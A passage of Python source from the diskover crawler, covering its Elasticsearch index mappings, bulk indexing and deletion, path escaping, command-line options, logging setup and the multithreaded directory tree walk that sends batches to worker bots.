# set up es index mappings and create new index
mappings = {
"settings": {
"index" : {
"number_of_shards": config['index_shards'],
"number_of_replicas": config['index_replicas']
}
},
"mappings": {
"diskspace": {
"properties": {
"path": {
"type": "keyword"
},
"total": {
"type": "long"
},
"used": {
"type": "long"
},
"free": {
"type": "long"
},
"available": {
"type": "long"
},
"indexing_date": {
"type": "date"
}
}
},
"crawlstat": {
"properties": {
"path": {
"type": "keyword"
},
"state": {
"type": "text"
},
"crawl_time": {
"type": "float"
},
"indexing_date": {
"type": "date"
}
}
},
"worker": {
"properties": {
"worker_name": {
"type": "keyword"
},
"dir_count": {
"type": "integer"
},
"file_count": {
"type": "integer"
},
"bulk_time": {
"type": "float"
},
"crawl_time": {
"type": "float"
},
"indexing_date": {
"type": "date"
}
}
},
"directory": {
"properties": {
"filename": {
"type": "keyword"
},
"path_parent": {
"type": "keyword"
},
"filesize": {
"type": "long"
},
"items": {
"type": "long"
},
"items_files": {
"type": "long"
},
"items_subdirs": {
"type": "long"
},
"owner": {
"type": "keyword"
},
"group": {
"type": "keyword"
},
"last_modified": {
"type": "date"
},
"last_access": {
"type": "date"
},
"last_change": {
"type": "date"
},
"hardlinks": {
"type": "integer"
},
"inode": {
"type": "keyword"
},
"tag": {
"type": "keyword"
},
"tag_custom": {
"type": "keyword"
},
"crawl_time": {
"type": "float"
},
"change_percent_filesize": {
"type": "float"
},
"change_percent_items": {
"type": "float"
},
"change_percent_items_files": {
"type": "float"
},
"change_percent_items_subdirs": {
"type": "float"
},
"worker_name": {
"type": "keyword"
},
"indexing_date": {
"type": "date"
}
}
},
"file": {
"properties": {
"filename": {
"type": "keyword"
},
"extension": {
"type": "keyword"
},
"path_parent": {
"type": "keyword"
},
"filesize": {
"type": "long"
},
"owner": {
"type": "keyword"
},
"group": {
"type": "keyword"
},
"last_modified": {
"type": "date"
},
"last_access": {
"type": "date"
},
"last_change": {
"type": "date"
},
"hardlinks": {
"type": "integer"
},
"inode": {
"type": "keyword"
},
"filehash": {
"type": "keyword"
},
"tag": {
"type": "keyword"
},
"tag_custom": {
"type": "keyword"
},
"dupe_md5": {
"type": "keyword"
},
"worker_name": {
"type": "keyword"
},
"indexing_date": {
"type": "date"
}
}
}
}
}
# check plugins for additional mappings
for plugin in plugins:
mappings = (plugin.add_mappings(mappings))
logger.info('Creating es index')
es.indices.create(index=indexname, body=mappings)
time.sleep(.5)
def index_bulk_add(es, doclist, config, cliargs):
"""This is the es index bulk add function.
It bulk adds/updates/removes using file/directory
meta data lists from worker's crawl results.
"""
if config['es_wait_status_yellow'] == "true":
# wait for es health to be at least yellow
es.cluster.health(wait_for_status='yellow',
request_timeout=config['es_timeout'])
# bulk load data to Elasticsearch index
diskover_connections.helpers.bulk(es, doclist, index=cliargs['index'],
chunk_size=config['es_chunksize'], request_timeout=config['es_timeout'])
def index_delete_path(path, cliargs, logger, reindex_dict, recursive=False):
"""This is the es delete path bulk function.
It finds all file and directory docs in path and deletes them from es
including the directory (path).
Recursive will also find and delete all docs in subdirs of path.
Stores any existing tags in reindex_dict.
Returns reindex_dict.
"""
file_id_list = []
dir_id_list = []
file_delete_list = []
dir_delete_list = []
# refresh index
es.indices.refresh(index=cliargs['index'])
# escape special characters
newpath = escape_chars(path)
# create wildcard string and check for / (root) path
if newpath == '\/':
newpathwildcard = '\/*'
else:
newpathwildcard = newpath + '\/*'
# file doc search
if recursive:
data = {
"query": {
"query_string": {
"query": "path_parent: " + newpath + " OR "
"path_parent: " + newpathwildcard,
"analyze_wildcard": "true"
}
}
}
else:
data = {
"query": {
"query_string": {
"query": "path_parent: " + newpath
}
}
}
logger.info('Searching for all files in %s' % path)
# search es and start scroll
res = es.search(index=cliargs['index'], doc_type='file', scroll='1m',
size=config['es_scrollsize'], body=data,
request_timeout=config['es_timeout'])
while res['hits']['hits'] and len(res['hits']['hits']) > 0:
for hit in res['hits']['hits']:
# add doc id to file_id_list
file_id_list.append(hit['_id'])
# add file path info inc. tags to reindex_file_list
reindex_dict['file'].append((hit['_source']['path_parent'] +
'/' + hit['_source']['filename'],
hit['_source']['tag'],
hit['_source']['tag_custom']))
# get es scroll id
scroll_id = res['_scroll_id']
# use es scroll api
res = es.scroll(scroll_id=scroll_id, scroll='1m',
request_timeout=config['es_timeout'])
logger.info('Found %s files for %s' % (len(file_id_list), path))
# add file id's to delete_list
for i in file_id_list:
d = {
'_op_type': 'delete',
'_index': cliargs['index'],
'_type': 'file',
'_id': i
}
file_delete_list.append(d)
if len(file_delete_list) > 0:
# bulk delete files in es
logger.info('Bulk deleting files in es index')
index_bulk_add(es, file_delete_list, config, cliargs)
# directory doc search
if recursive:
data = {
'query': {
'query_string': {
'query': '(path_parent: ' + newpath + ') OR '
'(path_parent: ' + newpathwildcard + ') OR (filename: "'
+ os.path.basename(path) + '" AND path_parent: "'
+ os.path.abspath(os.path.join(path, os.pardir)) + '")',
'analyze_wildcard': 'true'
}
}
}
else:
data = {
'query': {
'query_string': {
'query': '(path_parent: ' + newpath + ') OR (filename: "'
+ os.path.basename(path) + '" AND path_parent: "'
+ os.path.abspath(os.path.join(path, os.pardir)) + '")'
}
}
}
logger.info('Searching for all directories in %s' % path)
# search es and start scroll
res = es.search(index=cliargs['index'], doc_type='directory', scroll='1m',
size=config['es_scrollsize'], body=data, request_timeout=config['es_timeout'])
while res['hits']['hits'] and len(res['hits']['hits']) > 0:
for hit in res['hits']['hits']:
# add directory doc id to dir_id_list
dir_id_list.append(hit['_id'])
# add directory path info inc. tags, filesize, items to reindex_dir_list
reindex_dict['directory'].append((hit['_source']['path_parent'] +
'/' + hit['_source']['filename'],
hit['_source']['tag'],
hit['_source']['tag_custom']))
# get es scroll id
scroll_id = res['_scroll_id']
# use es scroll api
res = es.scroll(scroll_id=scroll_id, scroll='1m',
request_timeout=config['es_timeout'])
logger.info('Found %s directories for %s' % (len(dir_id_list), path))
# add dir id's to delete_list
for i in dir_id_list:
d = {
'_op_type': 'delete',
'_index': cliargs['index'],
'_type': 'directory',
'_id': i
}
dir_delete_list.append(d)
if len(dir_delete_list) > 0:
# bulk delete directories in es
logger.info('Bulk deleting directories in es index')
index_bulk_add(es, dir_delete_list, config, cliargs)
return reindex_dict
def index_get_docs(cliargs, logger, doctype='directory', copytags=False, hotdirs=False,
index=None, path=None, sort=False, maxdepth=None, pathid=False):
"""This is the es get docs function.
It finds all docs (by doctype) in es and returns doclist
which contains doc id, fullpath and mtime for all docs.
If copytags is True will return tags from previous index.
If path is specified will return just documents in and under directory path.
If sort is True, will return paths in asc path order.
if pathid is True, will return dict with path and their id.
"""
data = _index_get_docs_data(index, cliargs, logger, doctype=doctype, path=path,
maxdepth=maxdepth, sort=sort)
# refresh index
es.indices.refresh(index)
# search es and start scroll
res = es.search(index=index, doc_type=doctype, scroll='1m',
size=config['es_scrollsize'], body=data, request_timeout=config['es_timeout'])
doclist = []
pathdict = {}
doccount = 0
while res['hits']['hits'] and len(res['hits']['hits']) > 0:
for hit in res['hits']['hits']:
fullpath = os.path.abspath(os.path.join(hit['_source']['path_parent'], hit['_source']['filename']))
if copytags:
doclist.append((fullpath, hit['_source']['tag'], hit['_source']['tag_custom'], doctype))
elif hotdirs:
doclist.append((hit['_id'], fullpath, hit['_source']['filesize'], hit['_source']['items'],
hit['_source']['items_files'], hit['_source']['items_subdirs']))
elif pathid:
rel_path = fullpath.replace(rootdir_path, ".")
pathdict[rel_path] = hit['_id']
else:
# convert es time to unix time format
mtime = time.mktime(datetime.strptime(
hit['_source']['last_modified'],
'%Y-%m-%dT%H:%M:%S').timetuple())
doclist.append((hit['_id'], fullpath, mtime, doctype))
doccount += 1
# use es scroll api
res = es.scroll(scroll_id=res['_scroll_id'], scroll='1m',
request_timeout=config['es_timeout'])
logger.info('Found %s %s docs' % (str(doccount), doctype))
if pathid:
return pathdict
else:
return doclist
def _index_get_docs_data(index, cliargs, logger, doctype='directory', path=None, maxdepth=None, sort=False):
if cliargs['copytags']:
logger.info('Searching for all %s docs with tags in %s...', doctype, index)
data = {
'_source': ['path_parent', 'filename', 'tag', 'tag_custom'],
'query': {
'query_string': {
'query': 'tag:(NOT "") OR tag_custom:(NOT "")'
}
}
}
elif cliargs['hotdirs']:
logger.info('Searching for all %s docs in %s...', doctype, index)
data = {
'_source': ['path_parent', 'filename', 'filesize', 'items', 'items_files', 'items_subdirs'],
'query': {
'match_all': {}
}
}
else:
if path is None:
if maxdepth is None:
logger.info('Searching for all %s docs in %s...', doctype, index)
data = {
'_source': ['path_parent', 'filename', 'last_modified', 'last_access', 'last_change'],
'query': {
'match_all': {}
}
}
else:
# depth at rootdir
num_sep = cliargs['rootdir'].count(os.path.sep)
n = num_sep + maxdepth - 1
regexp = '(/[^/]+){1,' + str(n) + '}|/?'
logger.info('Searching for all %s docs in %s (maxdepth %s)...', doctype, index, maxdepth)
data = {
'_source': ['path_parent', 'filename', 'last_modified', 'last_access', 'last_change'],
'query': {
'regexp': {'path_parent': regexp}
}
}
else:
# escape special characters
newpath = escape_chars(path)
# create wildcard string and check for / (root) path
if newpath == '\/':
newpathwildcard = '\/*'
else:
newpathwildcard = newpath + '\/*'
logger.info('Searching for all %s docs in %s for path %s...', doctype, index, path)
data = {
'_source': ['path_parent', 'filename', 'last_modified', 'last_access', 'last_change'],
'query': {
'query_string': {
'query': '(path_parent: ' + newpath + ') OR '
'(path_parent: ' + newpathwildcard + ') OR (filename: "'
+ os.path.basename(path) + '" AND path_parent: "'
+ os.path.abspath(os.path.join(path, os.pardir)) + '")',
}
}
}
if sort:
data['sort'] = [{'path_parent': {'order': 'desc'}}]
return data
def replace_path(path):
"""This is the replace path function.
It replaces paths and drive letters sent to bots.
"""
frompath = cliargs['replacepath'][0]
topath = cliargs['replacepath'][1]
path = path.replace(frompath, topath)
# change any windows path separators (for bots running in linux)
path = path.replace('\\', '/')
return path
def split_list(a, n):
"""Generator that splits list a evenly into n pieces
"""
if IS_PY3:
xrange = range
k, m = divmod(len(a), n)
return (a[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in xrange(n))
def add_diskspace(index, logger, path):
"""This is the add disk space function.
It adds total, used, free and available
disk space for a path to es.
"""
try: # linux
statvfs = os.statvfs(path)
# Size of filesystem in bytes
total = statvfs.f_frsize * statvfs.f_blocks
# Actual number of free bytes
free = statvfs.f_frsize * statvfs.f_bfree
# Number of free bytes that ordinary users are allowed
# to use (excl. reserved space)
available = statvfs.f_frsize * statvfs.f_bavail
except AttributeError: # windows
import ctypes
total_bytes = ctypes.c_ulonglong(0)
free_bytes = ctypes.c_ulonglong(0)
available_bytes = ctypes.c_ulonglong(0)
ctypes.windll.kernel32.GetDiskFreeSpaceExW(ctypes.c_wchar_p(path),
ctypes.pointer(available_bytes),
ctypes.pointer(total_bytes),
ctypes.pointer(free_bytes))
total = total_bytes.value
free = free_bytes.value
available = available_bytes.value
if cliargs['replacepath']:
path = replace_path(path)
used = total - free
indextime_utc = datetime.utcnow().isoformat()
data = {
"path": path,
"total": total,
"used": used,
"free": free,
"available": available,
"indexing_date": indextime_utc
}
# add to es
logger.info('Adding disk space info to es index')
es.index(index=index, doc_type='diskspace', body=data)
def add_crawl_stats(es, index, path, crawltime, state):
"""This is the add crawl stats function.
It adds crawl stats info to es when crawl starts and finishes.
"""
data = {
"path": path,
"state": state, # running, finished_crawl, finished_dircalc
"crawl_time": round(crawltime, 6),
"indexing_date": datetime.utcnow().isoformat()
}
es.index(index=index, doc_type='crawlstat', body=data)
def dir_excluded(path, config, cliargs):
"""Return True if path in excluded_dirs set,
False if not in the list"""
name = os.path.basename(path)
# return if directory in included list (whitelist)
if name in config['included_dirs'] or path in config['included_dirs']:
return False
# skip any dirs in excluded_dirs
if name in config['excluded_dirs'] or path in config['excluded_dirs']:
if cliargs['verbose']:
logger.info('Skipping (excluded dir) %s', path)
return True
# skip any dirs which start with . (dot) and in excluded_dirs
if name.startswith('.') and u'.*' in config['excluded_dirs']:
if cliargs['verbose']:
logger.info('Skipping (.* dir) %s', path)
return True
# skip any dirs that are found in reg exp checks including wildcard searches
found_dir = False
found_path = False
for d in config['excluded_dirs']:
if d == '.*':
continue
if d.startswith('*') and d.endswith('*'):
d = d.replace('*', '')
if re.search(d, name):
found_dir = True
break
elif re.search(d, path):
found_path = True
break
elif d.startswith('*'):
d = d + '$'
if re.search(d, name):
found_dir = True
break
elif re.search(d, path):
found_path = True
break
elif d.endswith('*'):
d = '^' + d
if re.search(d, name):
found_dir = True
break
elif re.search(d, path):
found_path = True
break
else:
if d == name:
found_dir = True
break
elif d == path:
found_path = True
break
if found_dir or found_path:
if cliargs['verbose']:
logger.info('Skipping (excluded dir) %s', path)
return True
return False
def escape_chars(text):
"""This is the escape special characters function.
It returns escaped path strings for es queries.
"""
# escape any backslash chars
text = text.replace('\\', '\\\\')
# escape any characters in chr_dict
chr_dict = {'\n': '\\n', '\t': '\\t',
'/': '\\/', '(': '\\(', ')': '\\)', '[': '\\[', ']': '\\]', '$': '\\$',
' ': '\\ ', '&': '\\&', '<': '\\<', '>': '\\>', '+': '\\+', '-': '\\-',
'|': '\\|', '!': '\\!', '{': '\\{', '}': '\\}', '^': '\\^', '~': '\\~',
'?': '\\?', ':': '\\:', '=': '\\=', '\'': '\\\'', '"': '\\"', '@': '\\@',
'.': '\\.', '#': '\\#', '*': '\\*'}
def char_trans(text, chr_dict):
for key, value in chr_dict.items():
text = text.replace(key, value)
return text
if IS_PY3:
text_esc = text.translate(str.maketrans(chr_dict))
else:
text_esc = char_trans(text, chr_dict)
return text_esc
def get_time(seconds):
"""This is the get time function
It returns human readable time format for stats.
"""
m, s = divmod(seconds, 60)
h, m = divmod(m, 60)
d, h = divmod(h, 24)
return "%dd:%dh:%02dm:%02ds" % (d, h, m, s)
def convert_size(size_bytes):
"""This is the convert size function
It returns human readable file sizes.
"""
if size_bytes == 0:
return "0B"
size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
i = int(math.floor(math.log(size_bytes, 1024)))
p = math.pow(1024, i)
s = round(size_bytes / p, 2)
return "%s %s" % (s, size_name[i])
def parse_cli_args(indexname):
"""This is the parse CLI arguments function.
It parses command line arguments.
"""
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--rootdir", metavar='ROOTDIR', default=".",
help="Directory to start crawling from (default: .)")
parser.add_argument("-m", "--mtime", metavar='DAYS', default=0, type=int,
help="Minimum (+num) / maximum (-num) days ago for file modified time (default: 0)")
parser.add_argument("-s", "--minsize", metavar='BYTES', default=1, type=int,
help="Minimum file size in Bytes (default: 1 Bytes)")
parser.add_argument("-e", "--indexemptydirs", action="store_true",
help="Index empty directories (default: don't index)")
parser.add_argument("-i", "--index", default=indexname,
help="Elasticsearch index name (default: from config)")
parser.add_argument("-M", "--maxdepth", type=int, default=None,
help="Maximum directory depth to crawl (default: None)")
parser.add_argument("-c", "--maxdcdepth", type=int, default=None,
help="Maximum directory depth to calculate directory sizes/items (default: None)")
parser.add_argument("-b", "--batchsize", type=int, default=50,
help="Batch size (dir count) for sending to worker bots (default: 50)")
parser.add_argument("-a", "--adaptivebatch", action="store_true",
help="Adaptive batch size for sending to worker bots (intelligent crawl)")
parser.add_argument("-T", "--walkthreads", type=int, default=cpu_count()*2,
help="Number of threads for treewalk (default: cpu core count x 2)")
parser.add_argument("-A", "--autotag", action="store_true",
help="Get bots to auto-tag files/dirs based on patterns in config")
parser.add_argument("-S", "--sizeondisk", action="store_true",
help="Store size on disk (disk usage size) using block count x blocksize instead of file size")
parser.add_argument("-B", "--blocksize", type=int, metavar='BLOCKSIZE', default=512,
help="Blocksize (in bytes) used for --sizeondisk (default: 512)")
parser.add_argument("-O", "--optimizeindex", action="store_true",
help="Optimize index at end of crawl (reduce size)")
parser.add_argument("-r", "--reindex", action="store_true",
help="Reindex directory (non-recursive), data is added to existing index")
parser.add_argument("-R", "--reindexrecurs", action="store_true",
help="Reindex directory and all subdirs (recursive), data is added to existing index")
parser.add_argument("-F", "--forcedropexisting", action="store_true",
help="Silently drop an existing index (if present)")
parser.add_argument("-D", "--finddupes", action="store_true",
help="Find duplicate files in existing index and update their dupe_md5 field")
parser.add_argument("-C", "--copytags", metavar='INDEX2',
help="Copy tags from index2 to index")
parser.add_argument("-H", "--hotdirs", metavar='INDEX2',
help="Find hot dirs by calculating change percents from index2 (prev index) and update \
change_percent fields in index")
parser.add_argument("-l", "--listen", action="store_true",
help="Start tcp socket server and listen for remote commands")
parser.add_argument("-L", "--listentwc", action="store_true",
help="Start tcp socket server and listen for messages from diskover treewalk client")
parser.add_argument("--twcport", type=int, metavar='PORT',
help="Port number for tree walk client socket server (default: from config)")
parser.add_argument("--dirsonly", action="store_true",
help="Don't include files in batch sent to bots, only send dirs, bots scan for files")
parser.add_argument("--replacepath", nargs=2, metavar="PATH",
help="Replace path, example: --replacepath Z:\\ /mnt/share/")
parser.add_argument("--crawlapi", action="store_true",
help="Use storage Restful API instead of scandir")
parser.add_argument("--storagent", metavar='HOST', nargs='+',
help="Use diskover Storage Agent instead of scandir")
parser.add_argument("--dircalcsonly", action="store_true",
help="Calculate sizes and item counts for each directory doc in existing index \
(done automatically after each crawl)")
parser.add_argument("--gourcert", action="store_true",
help="Get realtime crawl data from ES for gource")
parser.add_argument("--gourcemt", action="store_true",
help="Get file mtime data from ES for gource")
parser.add_argument("-q", "--quiet", action="store_true",
help="Runs with no output")
parser.add_argument("-v", "--verbose", action="store_true",
help="Increase output verbosity")
parser.add_argument("--debug", action="store_true",
help="Debug message output")
parser.add_argument("--listplugins", action="store_true",
help="List plugins")
parser.add_argument("-V", "--version", action="version",
version="diskover v%s" % version,
help="Prints version and exits")
args = parser.parse_args()
if args.index:
args.index = args.index.lower()
return args
def log_setup(cliargs):
"""This is the log set up function.
It configures log output for diskover.
"""
diskover_logger = logging.getLogger('diskover')
diskover_logger.setLevel(logging.INFO)
es_logger = logging.getLogger('elasticsearch')
es_logger.setLevel(logging.WARNING)
urllib3_logger = logging.getLogger('urllib3')
urllib3_logger.setLevel(logging.WARNING)
requests_logger = logging.getLogger('requests')
requests_logger.setLevel(logging.WARNING)
logging.addLevelName(
logging.INFO, "\033[1;32m%s\033[1;0m"
% logging.getLevelName(logging.INFO))
logging.addLevelName(
logging.WARNING, "\033[1;31m%s\033[1;0m"
% logging.getLevelName(logging.WARNING))
logging.addLevelName(
logging.ERROR, "\033[1;41m%s\033[1;0m"
% logging.getLevelName(logging.ERROR))
logging.addLevelName(
logging.DEBUG, "\033[1;33m%s\033[1;0m"
% logging.getLevelName(logging.DEBUG))
logformatter = '%(asctime)s [%(levelname)s][%(name)s] %(message)s'
loglevel = logging.INFO
logging.basicConfig(format=logformatter, level=loglevel)
if cliargs['verbose']:
diskover_logger.setLevel(logging.INFO)
es_logger.setLevel(logging.INFO)
urllib3_logger.setLevel(logging.INFO)
requests_logger.setLevel(logging.INFO)
if cliargs['debug']:
diskover_logger.setLevel(logging.DEBUG)
es_logger.setLevel(logging.DEBUG)
urllib3_logger.setLevel(logging.DEBUG)
requests_logger.setLevel(logging.DEBUG)
if cliargs['quiet']:
diskover_logger.disabled = True
es_logger.disabled = True
urllib3_logger.disabled = True
requests_logger.disabled = True
return diskover_logger
def progress_bar(event):
if event == 'Checking' or event == 'Calculating':
widgets = [progressbar.AnimatedMarker(), ' ', event + ' (Queue: ', progressbar.Counter(), ') ', progressbar.Timer()]
bar = progressbar.ProgressBar(widgets=widgets, max_value=progressbar.UnknownLength)
else:
widgets = [event + ' ', progressbar.Bar(), progressbar.Percentage(),
' (', progressbar.Timer(), ', ', progressbar.ETA(), ')']
bar = progressbar.ProgressBar(widgets=widgets, max_value=100)
return bar
def adaptive_batch(q, cliargs, batchsize):
"""This is the adaptive batch function.
It auto adjusts the batch size sent to rq.
Could be made better :)
"""
q_len = len(q)
if q_len == 0:
if (batchsize - ab_step) >= ab_start:
batchsize = batchsize - ab_step
elif q_len > 0:
if (batchsize + ab_step) <= ab_max:
batchsize = batchsize + ab_step
cliargs['batchsize'] = batchsize
return batchsize
def calc_dir_sizes(cliargs, logger, path=None):
from diskover_bot_module import calc_dir_size
jobcount = 0
# max depth to calc dir sizes
maxdepth = cliargs['maxdcdepth']
index = cliargs['index']
try:
# wait for worker bots to be idle and all queues are empty
logger.info('Waiting for diskover worker bots to be done with any jobs in rq...')
while worker_bots_busy([q, q_crawl, q_calc]):
time.sleep(1)
if cliargs['adaptivebatch']:
batchsize = ab_start
else:
batchsize = cliargs['batchsize']
if cliargs['verbose'] or cliargs['debug']:
logger.info('Batch size: %s' % batchsize)
# use generator and yield docs while scrolling index in es
logger.info('Getting diskover bots to calculate directory sizes (maxdepth %s)...' % maxdepth)
if not cliargs['quiet'] and not cliargs['debug'] and not cliargs['verbose']:
bar = progress_bar('Calculating')
bar.start()
else:
bar = None
data = _index_get_docs_data(index, cliargs, logger, path=path, maxdepth=maxdepth)
# refresh index
es.indices.refresh(index)
starttime = time.time()
# search es and start scroll
res = es.search(index=index, doc_type='directory', scroll='1m',
size=config['es_scrollsize'], body=data, request_timeout=config['es_timeout'])
dirlist = []
dircount = 0
while res['hits']['hits'] and len(res['hits']['hits']) > 0:
for hit in res['hits']['hits']:
fullpath = os.path.join(hit['_source']['path_parent'], hit['_source']['filename'])
# convert es time to unix time format
mtime = time.mktime(datetime.strptime(hit['_source']['last_modified'],
'%Y-%m-%dT%H:%M:%S').timetuple())
atime = time.mktime(datetime.strptime(hit['_source']['last_access'],
'%Y-%m-%dT%H:%M:%S').timetuple())
ctime = time.mktime(datetime.strptime(hit['_source']['last_change'],
'%Y-%m-%dT%H:%M:%S').timetuple())
dirlist.append((hit['_id'], fullpath, mtime, atime, ctime))
dircount += 1
dirlist_len = len(dirlist)
if dirlist_len >= batchsize:
q_calc.enqueue(calc_dir_size, args=(dirlist, cliargs,), result_ttl=config['redis_ttl'])
jobcount += 1
if cliargs['debug'] or cliargs['verbose']:
logger.info("enqueued batchsize: %s (batchsize: %s)" % (dirlist_len, batchsize))
del dirlist[:]
if cliargs['adaptivebatch']:
batchsize = adaptive_batch(q_crawl, cliargs, batchsize)
if cliargs['debug'] or cliargs['verbose']:
logger.info("batchsize set to: %s" % batchsize)
# update progress bar
if bar:
try:
bar.update(len(q_calc))
except (ZeroDivisionError, ValueError):
bar.update(0)
# use es scroll api
res = es.scroll(scroll_id=res['_scroll_id'], scroll='1m',
request_timeout=config['es_timeout'])
# enqueue dir calc job for any remaining in dirlist
if len(dirlist) > 0:
q_calc.enqueue(calc_dir_size, args=(dirlist, cliargs,), result_ttl=config['redis_ttl'])
jobcount += 1
logger.info('Found %s directory docs' % str(dircount))
# set up progress bar with time remaining
if bar:
bar.finish()
bar_max_val = len(q_calc)
bar = progressbar.ProgressBar(max_value=bar_max_val)
bar.start()
# update progress bar until all worker bots are idle and q_calc queue is empty
while worker_bots_busy([q_calc]):
if bar:
q_len = len(q_calc)
try:
bar.update(bar_max_val - q_len)
except (ZeroDivisionError, ValueError):
bar.update(0)
time.sleep(1)
if bar:
bar.finish()
elapsed = get_time(time.time() - starttime)
logger.info('Finished calculating %s directory sizes in %s' % (dircount, elapsed))
except KeyboardInterrupt:
print("Ctrl-c keyboard interrupt, shutting down...")
sys.exit(0)
def scandirwalk_worker(threadn, cliargs, logger):
dirs = []
nondirs = []
# check if we are using storage agent and make connection
if cliargs['storagent']:
stor_agent = True
hostlist = cliargs['storagent']
stor_agent_conn = diskover_agent.AgentConnection(hosts=hostlist)
stor_agent_conn.connect()
if cliargs['debug'] or cliargs['verbose']:
logger.info("[thread-%s] Connected to Storage Agent host: %s" % (threadn, stor_agent_conn.conn_host()))
else:
stor_agent = False
while True:
path = q_paths.get()
try:
q_paths_in_progress.put(path)
if cliargs['debug'] or cliargs['verbose']:
logger.info("[thread-%s] scandirwalk_worker: %s" % (threadn, path))
if cliargs['crawlapi']:
root, api_dirs, api_nondirs = api_listdir(path, api_ses)
path = root
for d in api_dirs:
if not dir_excluded(d[0], config, cliargs):
dirs.append(d)
if not cliargs['dirsonly']:
for f in api_nondirs:
nondirs.append(f)
del api_dirs[:]
del api_nondirs[:]
elif stor_agent:
# grab dir list from storage agent server
dir_list = stor_agent_conn.listdir(path)
logger.debug("[thread-%s] scandirwalk_worker: Storage Agent host response time: %s" % (threadn, stor_agent_conn.response_time()))
path, dirs_noexcl, nondirs = dir_list
for d in dirs_noexcl:
if not dir_excluded(d, config, cliargs):
dirs.append(d)
else:
item_count = 0
for entry in scandir(path):
if entry.is_dir(follow_symlinks=False) and not dir_excluded(entry.path, config, cliargs):
dirs.append(entry.name)
elif entry.is_file(follow_symlinks=False) and not cliargs['dirsonly']:
nondirs.append(entry.name)
if item_count == 100000:
if cliargs['debug'] or cliargs['verbose']:
logger.info("[thread-%s] scandirwalk_worker: processing directory with many files: %s" % (threadn, path))
else:
item_count += 1
q_paths_results.put((path, dirs[:], nondirs[:]))
except (OSError, IOError) as e:
logger.warning("[thread-%s] OS/IO Exception caused by: %s" % (threadn, e))
pass
except UnicodeDecodeError as e:
logger.warning("[thread-%s] Unicode Decode Exception caused by: %s (path: %s)" % (threadn, e, path))
pass
except Exception as e:
logger.error("[thread-%s] Exception caused by: %s" % (threadn, e))
raise
finally:
q_paths_in_progress.get()
del dirs[:]
del nondirs[:]
q_paths.task_done()
def scandirwalk(path, cliargs, logger):
q_paths.put(path)
while True:
entry = q_paths_results.get()
root, dirs, nondirs = entry
if cliargs['debug'] or cliargs['verbose']:
if cliargs['crawlapi']:
logger.info("apiwalk: %s (dircount: %s, filecount: %s)" % (root[0], str(len(dirs)), str(len(nondirs))))
else:
logger.info("scandirwalk: %s (dircount: %s, filecount: %s)" % (root, str(len(dirs)), str(len(nondirs))))
# yield before recursion
yield root, dirs, nondirs
# recurse into subdirectories
if cliargs['crawlapi']:
for d in dirs:
q_paths.put(d[0])
else:
for name in dirs:
new_path = os.path.join(root, name)
q_paths.put(new_path)
q_paths_results.task_done()
if q_paths_results.qsize() == 0 and q_paths.qsize() == 0:
time.sleep(.5)
if q_paths_results.qsize() == 0 and q_paths.qsize() == 0 and q_paths_in_progress.qsize() == 0:
break
def treewalk(top, num_sep, level, batchsize, cliargs, logger, reindex_dict):
"""This is the tree walk function.
It walks the tree and adds tuple of directory and it's items
to redis queue for rq worker bots to scrape meta and upload
to ES index after batch size (dir count) has been reached.
"""
from diskover_bot_module import scrape_tree_meta
batch = []
dircount = 0
totaldirs = 0
totalfiles = 0
starttime = time.time()
# set up threads for tree walk
for i in range(cliargs['walkthreads']):
t = Thread(target=scandirwalk_worker, args=(i, cliargs, logger,))
t.daemon = True
t.start()
# set up progress bar
if not cliargs['quiet'] and not cliargs['debug'] and not cliargs['verbose']:
widgets = [progressbar.AnimatedMarker(), ' Crawling (Queue: ', progressbar.Counter(),
progressbar.FormatLabel(''), ') ', progressbar.Timer()]
bar = progressbar.ProgressBar(widgets=widgets, max_value=progressbar.UnknownLength)
bar.start()
else:
bar = None
bartimestamp = time.time()
for root, dirs, files in scandirwalk(top, cliargs, logger):
dircount += 1
totaldirs += 1
files_len = len(files)
dirs_len = len(dirs)
# check for empty dirs
if not cliargs['indexemptydirs'] and not cliargs['dirsonly']:
if dirs_len == 0 and files_len == 0:
if cliargs['debug'] or cliargs['verbose']:
logger.info("skipping empty dir: %s" % root)
continue
totalfiles += files_len
# replace path if cliarg
if cliargs['replacepath']:
root = replace_path(root)
if cliargs['dirsonly']:
batch.append((root, dirs))
else:
batch.append((root, dirs, files))
batch_len = len(batch)
if batch_len >= batchsize or (cliargs['adaptivebatch'] and totalfiles >= config['adaptivebatch_maxfiles']):
q_crawl.enqueue(scrape_tree_meta, args=(batch, cliargs, reindex_dict,),
result_ttl=config['redis_ttl'])
if cliargs['debug'] or cliargs['verbose']:
logger.info("enqueued batchsize: %s (batchsize: %s)" % (batch_len, batchsize))
del batch[:]
totalfiles = 0
if cliargs['adaptivebatch']:
batchsize = adaptive_batch(q_crawl, cliargs, batchsize)
if cliargs['debug'] or cliargs['verbose']:
logger.info("batchsize set to: %s" % batchsize)
# check if at maxdepth level and delete dirs/files lists to not
# descend further down the tree
if cliargs['maxdepth']:
num_sep_this = root.count(os.path.sep)
if num_sep + level <= num_sep_this:
del dirs[:]
del files[:]
# update progress bar
if bar:
try:
if time.time() - bartimestamp >= 2:
elapsed = round(time.time() - bartimestamp, 3)
dirspersec = round(dircount / elapsed, 3)
widgets[4] = progressbar.FormatLabel(', ' + str(dirspersec) + ' dirs/sec) ')
bartimestamp = time.time()
dircount = 0
bar.update(len(q_crawl))
except (ZeroDivisionError, ValueError):
bar.update(0)
# add any remaining in batch to queue
if len(batch) > 0:
q_crawl.enqueue(scrape_tree_meta, args=(batch, cliargs, reindex_dict,), result_ttl=config['redis_ttl'])
# set up progress bar with time remaining
if bar:
bar.finish()
bar_max_val = len(q_crawl)
bar = progressbar.ProgressBar(max_value=bar_max_val)
bar.start()
# update progress bar until bots are idle and queue is empty
while worker_bots_busy([q_crawl]):
if bar:
q_len = len(q_crawl)
try:
bar.update(bar_max_val - q_len)
except (ZeroDivisionError, ValueError):
bar.update(0)
time.sleep(1)
if bar:
bar.finish()
elapsed = time.time() - starttime
dirspersec = round(totaldirs / elapsed, 3)
elapsed = get_time(elapsed)
logger.info("Finished crawling in %s, dirs walked %s (%s dirs/sec)" %
(elapsed, totaldirs, dirspersec))
def crawl_tree(path, cliargs, logger, reindex_dict):
"""This is the crawl tree function.
It sets up the directory tree walking.
"""
try:
wait_for_worker_bots(logger)
logger.info('Enqueueing crawl to diskover worker bots for %s...', path)
if cliargs['autotag']:
logger.info("Worker bots set to auto-tag (-A)")
if cliargs['sizeondisk']:
